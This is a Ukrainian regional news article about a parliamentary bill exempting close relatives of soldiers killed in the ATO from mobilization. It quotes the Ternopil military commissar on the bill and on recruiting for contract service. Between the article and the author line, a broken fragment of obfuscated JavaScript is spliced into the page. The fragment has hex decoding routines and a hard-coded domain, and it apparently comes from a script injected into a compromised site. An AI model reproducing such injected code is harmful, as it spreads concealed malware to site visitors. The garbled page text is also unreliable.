Ви знаходитесь: Головна / Новини / Родичів, загиблих в АТО бійців, звільнили від мобілізації

Родичів, загиблих в АТО бійців, звільнили від мобілізації

Верховна Рада проголосувала за законопроект, який  звільнить близьких родичів тих, хто загинув під час АТО, від мобілізації. Закон дозволяє їм служити лише в разі добровільної згоди.

ВОЛОДИМИР КАТИНСЬКИЙ, військовий комісар Тернопільського обласного військового комісаріату

«Поки що я думаю, це абсолютно справедливо, що родичі загиблих учасників АТО не повинні брати вже участь в Антитерористичній операції, це брати сестри, батьки».

В тому числі повнорідні чи неповнорідні брати та сестри. А також під мобілізацію не підпадатимуть родичі загиблих чи зниклих безвісти у зоні АТО цивільних громадян. Для цього потрібно буде зібрати необхідні документи. Але наразі про сьому хвилю мобілізації не йдеться. Військомати пропонують йти до армії за контрактом.

ВОЛОДИМИР КАТИНСЬКИЙ, військовий комісар Тернопільського обласного військового комісаріату

«Багато вакантних посад залишається в бригаді, в тому числі і водії, і ремонтних спеціальностей, і медичні працівники, крім військових спеціальностей. Це є командири гармат, навідники, розвідники. В тому числі і оркестранти, які займаються, абсолютно, ви бачите, мирною працею, в бойові військові частини також запрошуємо».

За службу за контрактом передбачене гідне грошове забезпечення, від семи тисяч гривень, а також пільги та надбавки. Наразі, за словами Володимира Катинського, завдання по набору на службу за контрактом виконане приблизно на 40%.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top